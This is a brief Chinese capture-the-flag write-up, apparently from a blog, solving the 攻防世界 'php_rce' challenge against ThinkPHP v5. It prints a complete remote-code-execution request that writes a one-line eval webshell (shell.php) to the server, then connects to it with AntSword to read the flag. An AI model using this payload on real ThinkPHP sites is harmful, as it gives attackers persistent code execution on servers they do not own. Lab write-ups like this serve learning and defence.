打开是thinkphp v5版本
攻防世界高阶之php_rce
根据版本号查询到有一个远程代码执行漏洞,查看权限
攻防世界高阶之php_rce可以产看到PHPinfo
攻防世界高阶之php_rce

直接写一句话上传上去
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=shell.php&vars[1][1]=<?php eval($_REQUEST["a"]);?>
用蚁剑连接之后
攻防世界高阶之php_rce在主目录下发现一个flag
攻防世界高阶之php_rce

相关文章:

  • 2022-12-23
  • 2021-08-05
  • 2021-09-27
  • 2021-06-19
  • 2021-12-26
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2021-07-24
  • 2021-05-16
  • 2021-11-28
  • 2022-12-23
  • 2021-07-01
  • 2021-10-14
相关资源
相似解决方案